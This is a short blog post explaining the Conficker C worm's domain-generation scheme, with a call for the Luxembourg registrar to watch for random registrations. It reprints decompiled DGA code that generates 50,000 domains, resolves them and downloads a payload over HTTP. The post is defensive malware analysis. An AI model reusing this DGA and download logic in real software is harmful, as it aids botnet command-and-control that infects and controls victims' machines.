For those not in the know : Conficker is one of the largest Worm botnets in existance, and conficker is the name attributed to the piece of malware used to create the botnet.

Conficker C uses a PRNG to generate a list of possible of rendez-vous points, in essence this are domain names (hosts) that have additional information and code to download. After the "fiasco" of having all their pseudo randomly generated domain names registered or blocked, the new conficker C variant, improved upon it's design. Conficker C now generates 50.000 possible combinations per day and adds the resulting string to 110 TLD.

Update : Confiker disinfection, Network scanners and more

Interestingly among the possible TLD is also Luxembourg (LU) domain. It will be interesting to see if it will be used and how Restena (the main registrar) will react. My guess it that they will most likely not succeed in getting their LU domain, since the back-end process is entirely manual (afaik).


So if somebody from restena is reading this post, if you get a request to register a random domain name like yxsdsdfsfd.lu you should react by informing your 2nd tier registrar that something might be fishy (appropriate noun in this case) and manualy verify a contact name and phone number prior to handing out the domain.
PS: Having not seen the PRNG, it might be totaly possible that a more meaningfull domain than random characters might be generated once in a while.


More Information : Excellent technical backround about Conficker C from SRI

The code used to generate the domain names is :


int domain_name_generation()
{
// local declarations
hMem = 0;
check_if_MS_DEF_PROV();
get_time_from_popular_web_sites();
// baidu.com, google.com, yahoo.com, ask.com, w3.org, // facebook.com, imageshack.us, rapidshare.com

hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
{
while ( 1 )
{
counter_domains = counter;
if ( counter >= 50000 )
break;

size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars

// append "." at the end of the name
random = DGA_random_function();
strcat(*end_of_random_name, (&array_top_domains)[4 * random % 116]);
// append to the name one of the 116 top domain names
++counter;
}

// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
{
// random number modulo 50,000
one_in_50000_names =
conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
{
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;

if ( *host_address )
{
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
{
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
{
is_blacklisted_ip =
check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
{
found = 0;
index = 0;
while (index < counter_domains )
{
if (host_address == array_previously_checked_IPs[index] )
{
found = 1;
break; // break if IP has been previously encountered
}
++index;
}
// skip if IP has been previously encountered
if ( !found )
{
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
}
}
}
}
}
}
Sleep(...); // sleep small random amount
++counter_domains;
}
}
GlobalFree(hMem);
return success_download;
}

0 comments

Post a Comment